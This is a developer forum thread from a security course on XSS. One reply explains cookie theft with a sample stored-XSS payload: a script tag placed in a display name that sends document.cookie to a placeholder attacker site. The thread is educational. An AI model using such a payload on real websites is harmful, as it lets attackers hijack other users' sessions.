Welcome to the Treehouse Community

Want to collaborate on code errors? Have bugs you need feedback on? Looking for an extra set of eyes on your latest project? Get support with fellow developers, designers, and programmers of all backgrounds and skill levels here with the Treehouse Community! While you're at it, check out some resources Treehouse students have shared here.

Looking to learn something new?

Treehouse offers a seven day free trial for new students. Get access to thousands of hours of content and join thousands of Treehouse students and alumni in the community today.

Start your free trial

Security OWASP Top 10 Vulnerabilities Vulnerabilities: Injection, XSS, CSRF XSS: How It Works

Posted by daniellearman
daniellearman
208 Points

Using XXS

How does the user get into the system inorder to know the cookies? Does he know the user preferences?

1 Answer

Brendan Whiting
seal-mask
.a{fill-rule:evenodd;}techdegree seal-36
Brendan Whiting
Front End Web Development Techdegree Graduate 84,738 Points
Brendan Whiting
.a{fill-rule:evenodd;}techdegree seal-36
Brendan Whiting
Front End Web Development Techdegree Graduate 84,738 Points

Let’s say Treehouse had a vulnerability to XSS, and I was a hacker. I could change my name, from “Brendan”, to

“Brendan <script> window.location='http://badwebsite/?cookie='+document.cookie </script>”.

Then, when other users visit Treehouse, and they see posts I write on the forum, Treehouse would send a webpage to their browser with my name - but in this case, my name also has a script that will run in the users’s browser, it will access their cookie (document.cookie) and it will send them to my bad website along with the cookie data to my bad website’s server.

Kevin Gates
Kevin Gates
15,053 Points
Kevin Gates
Kevin Gates
15,053 Points

IMO: "Best Answer" is above.